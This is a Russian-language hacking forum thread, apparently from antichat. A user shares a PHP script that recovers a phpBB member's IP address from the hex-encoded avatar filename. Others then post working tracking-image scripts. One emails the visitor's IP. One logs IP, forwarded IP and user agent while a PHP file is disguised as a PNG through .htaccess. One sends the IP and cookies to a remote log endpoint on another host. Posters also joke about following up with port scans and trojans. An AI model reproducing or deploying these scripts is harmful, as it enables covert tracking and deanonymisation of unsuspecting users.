Небольшой скрипт, для того, что бы узнать IP пользователя на форуме phpBB... есть 3 нюанса:

1. Узнать IP можно только у пользователя с аватарой... (причем IP на тот момент, когда он аватару прекреплял)

2. Работает не на всех форумах, но на подавляющем большинстве...

3. Вводить нужно не номер пользователя в списке пользователей, а его id

вот код:
<html>

<head>
<title></title>
</head>

<body>

<?php
error_reporting(E_ALL);
set_time_limit(0);
echo "<pre>";
$k=$PHP_SELF;
$pr='';
$ip='';
$pat='/(http:\/\/)?([^\/]+)/i';
if (!isset($adr)){$adr='';}
echo "by Scipio<br>\n\n\n";
echo "<form action='".$k."' method='post'>";
echo "<p>путь к форуму:<br>";
echo "<input type='text' name='adr' value='".$adr."'/><br><br>";
echo "id пользователя:<br>";
echo "<input type='text' name='id'/><br><br>";
echo "<input type='submit' name='submit' value='Жмем и пробуем' />";
echo "</p>";
if (!isset($id)){die;}
if (empty($adr) or empty($id))
{die ("не все поля заполнены");}
else
{$adr=trim($adr);
preg_match($pat,$adr, $matches);
@$pr= $matches[1];
@$host = $matches[2];
$qr=explode($pr.$host,$adr);
$qveria=$qr[1];
empty($qveria)?$qveria='/':$qveria=$qveria;
$ock=fsockopen($host,80);
$pac="GET ".$qveria."/"."profile.php?mode=viewprofile&u=".$id." HTTP/1.0\r\nHost: ".$host."\r\n\r\n";
fputs ($ock,$pac);
while (!feof($ock))
{
//echo fgets ($ock,128);
$st=fgets ($ock,128);

if (preg_match("/avatars\//i",$st,$_8)) {
$cod=explode($_8[0],$st);
$cod=substr($cod[1],0,8);


for ($i=0;$i<8;$i=$i+2)
{$ipd=$cod{$i}.$cod{$i+1};
$ip=$ip.hexdec($ipd).'.';


}

}

}
fclose ($ock);
}
if (!empty($ip)){ $ip=substr_replace($ip, '', strlen($ip)-1);
echo "ip:".$ip."<a href=http://old.antichat.ru/util/whois/?ip=".$ip.">[whois]</a>";}else{die("узнать ip не удалось");}

echo "</pre>";

?>

</body>

</html>

Не судите строго, если комуто понадобится... буду улучшать и может быть переведу на perl...

Смотри в чем дело.. Ip у всех динамический.. Не легче сделать что-то типа тойже картинки(это я к примеру) и просто скрипт ведения логов сделать. тогда уж будет гарантированно узнавать Ip.. Вроде видела где-то.. Да и СИ никто не отменял..

Смотри в чем дело.. Ip у всех динамический.. Не легче сделать что-то типа тойже картинки(это я к примеру) и просто скрипт ведения логов сделать. тогда уж будет гарантированно узнавать Ip.. Вроде видела где-то.. Да и СИ никто не отменял..

ip - то динамический, но вот подсеть чаще всего не меняется...
для абуза сойдет...

и еще... ты немного не поняла сам код... тут айпи получается из названия файла-аватары

Scipio, да, код я вполне возможно не поняла.. но.. все же.. учусь понемногу. И предложила альтернативный метод..

ну подсеть-то да..

Смотри в чем дело.. Ip у всех динамический.. Не легче сделать что-то типа тойже картинки(это я к примеру) и просто скрипт ведения логов сделать. тогда уж будет гарантированно узнавать Ip.. Вроде видела где-то.. Да и СИ никто не отменял..

/* если чето и получится наподобие, то логи должны вестись на серваке */
И при чем тут СИ?

Хм, а у меня друга идея появилась, вы когд-нибудь видели картинки в подписях, типо там ваш айпи светится, можно такую картинку сделать и маршуритизировать через скрипт каторый будет отлавливать пакет и данные сохронять где-нибудь на фтп.
Даже думаю можно сделать так (но это уже труднея, я даже плохова-то знаю как) чтобы и ник человека в лог писался.
Если кто реализует, напиши-те что идея моя.

Хм, а у меня друга идея появилась, вы когд-нибудь видели картинки в подписях, типо там ваш айпи светится, можно такую картинку сделать и маршуритизировать через скрипт каторый будет отлавливать пакет и данные сохронять где-нибудь на фтп.
Даже думаю можно сделать так (но это уже труднея, я даже плохова-то знаю как) чтобы и ник человека в лог писался.
Если кто реализует, напиши-те что идея моя.

Это можно... (мож кто так и делает) вопрос втом, можно ли с серва коннектится к чужим сокетам, да и ник не узнаешь... так как идентификация идет по кукам (и ip иногда), а там ники не прописываются, хотя могут быть и исключения

2all Ну как скрипт работает?

Sandjuro, ну почему трудно? вот я например отлично знаю, что моя подпись... она идет с самшита, а туда IP пишется. логи кароч.. примерно про это и говорила.. еще можно просто оформить не как подпись, а так.. ссылочку пихнуть, а кто туда заходил - логи сделать! в общем, способов много!

Scipio, Ладно потправим идею, Делаем скрипт для определения айпи, Делаем картинку каторая работает с этим скриптом, + возможно чтобы он айди юзера собирал? это ж уже свой будет скрипт с картинкой, а картинку можно любую, чтобы даже не палили что это не просто картинка :)
Ах да, потом этотот скрипт может перенаправлять все по данному адресу (каторый впишем) и там уже сработает обычный php файлик каторый все красиве в txt и упакует
Как тебе такая идея?

ну типа активной Xss`ки? вот узерид можно... на атичате они в куки пишутся, но имхо не везде... а попробовать можно... послушать бы админов античата?

Нет, не Xss, Ладно для уточнения так скажу, ты можеш забацать такуежу картинку чтобы она айпи опредиляла и коннект был с твоим серваком

Вы наконец поняли как узнать айпи хакера???Надо чтобы потом сразу же порты сканировались и авторутер запускался и потом логи по почте лучше бандеролью.

Надо чтобы потом сразу же порты сканировались
Ты писал как стеб, но меня на идею автоматического впаривания трояна появилась, но это потом ;)

Scipio, нее.. xss'ка - это другое.. там уже все куки прет же, и к томуже сниффер нужен. Это уже уязвимости юзает, а следовательно способ имеет ряд недостатков и неуниверсален. И он не тупо IPшник узнает.. так что.. делаем выводы сами..

ну вот к примеру, чтобы узнать Ip мы же не будем у булки(считается одним из самых безопасных форумов) искать уязвимости... Правильно? нам легче картинку залить. или ссылочку..

ты это имелл ввиду?
<?php
Header("Content-type: image/png");
$string="$REMOTE_ADDR";
$tex="Scipio has your ip";
$img = ImageCreateFromPng("image.png");
$colr = ImageColorAllocate($img, 225, 225, 225);
mail("scipio@example.com", "log", $string);
ImageString($img,3,75,43, $tex,$colr);
ImagePng($img);
ImageDestroy($img);
?>

?

Scipio, Ну как я понял он узнает айпи и перешлет тебе на почту, узника в подпись себе такую, и скажи сработало.
Этот способ помоему намного актуальней

Scipio, один из методов по сути..

Scipio, Ну как я понял он узнает айпи и перешлет тебе на почту, узника в подпись себе такую, и скажи сработало.
Этот способ помоему намного актуальней

Не думаю, что все позволят так просто почту отправлять... да и в пхпББ нет картинок-подписей

так почту бомбить можно было бы...

Не думаю, что все позволят так просто почту отправлять... да и в пхпББ нет картинок-подписей
Ок, а если аватарка, загрузить её с помощью веб ссылки...Хотя нет, с аватакой может и не прокатить, там уже примудрости в том что она загрузится, или если указывать ссылку на аватарку то она не грузится на серв где форум?
в любом случии не обезательно на почту, лучше в лог, а то отписавшись в популярной теме с просмотрами в 1000, хуже спама будет.
Можеш тут юзнуть этот способ?

Scipio, впринципе.. даже самый простенький фаер не позволит долбиться чему-либо непонятному на SMTP.. но ведь форум - это форум.. хотя у хостера вроде фаеры стоят. нет.. лучше сделать тупо на хостинг..

мой зайчег сполил ваши ип )

http://eprst.fatal.ru/upload/palevo/a3.png

http://eprst.fatal.ru/upload/palevo/der.txt

a3.png
<?
$f = "der.txt";

$r_add = $_SERVER['REMOTE_ADDR'];
$real_ip = htmlspecialchars($_SERVER['HTTP_X_FORWARDED_FOR']);
$agent = htmlspecialchars($_SERVER['HTTP_USER_AGENT']);
$c = "ip [".$r_add."] agent [".$agent."] real_ip".$real_ip." time [".date("d.m.Y H:i:s")."]\r";
function put_file_content($filename, $content)
{
$fp = fopen($filename, "a");
fputs($fp, $content);
fclose($fp);
return true;
}
put_file_content($f, $c);

Header("Content-type: image/png");
$im = ImageCreateFromPng("6.png");
ImagePng($im);
ImageDestroy($im);
?>

.htaccess
AddType application/x-httpd-php .png

зы. написал, а забыл отпостить =\
зыы. Сегодня 01:02
Scipio
сразу мог это написать ведь, а не изврощаться ;)

А если на хосте нет .htaccess, то просто создать файл с болокнота? и в корень?
+ Вообщем у меня опять идеи есть, но нехрина я кодить не умею :(
вот гавно-то

c411k, тема! Я даже все поняла.. А то вечно у меня все криво выходит.. ))

<?php
Header("Content-type: image/png");
$string=$REMOTE_ADDR;
$cooc=$_COOKIE;
$tex="Scipio has your ip";
$img = ImageCreateFromPng("image.png");
$colr = ImageColorAllocate($img, 225, 225, 225);
$ock=fsockopen($host,80);
$pac="GET /log.php?ip=".$string."&coo=".$cooc." HTTP/1.0\r\nHost: blabla.ru\r\n\r\n";
fputs ($ock,$pac);
ImageString($img,3,75,43, $tex,$colr);
ImagePng($img);
ImageDestroy($img);
?>


ну только вот че придумал

меня блин опередили

да чето я забыл что пхп скрипт на удаленном хосте... крыша едет :confused:

мой зайчег сполил ваши ип )

сразу мог это написать ведь, а не изврощаться ;)
Это ты про че?

кстати куки получить не удастся... т.к. куки идут с сайта, на котором скрипт-картинка находится... а по другому, как получить id пользователя я не знаю...

даже скорее знаю, что никак...

а в остольном все работает

мой скрипт немного отличается от скрипта c411k, но не пренципиально, так что приводить его здесь я думаю не стоит...

да и еще раз повторюсь... на phpBB такая тема не катит, так что пользуйте 1-й скрипт... Да и вобще это разные вещи... с банером - это сниффер, а 1-й скрипт определения IP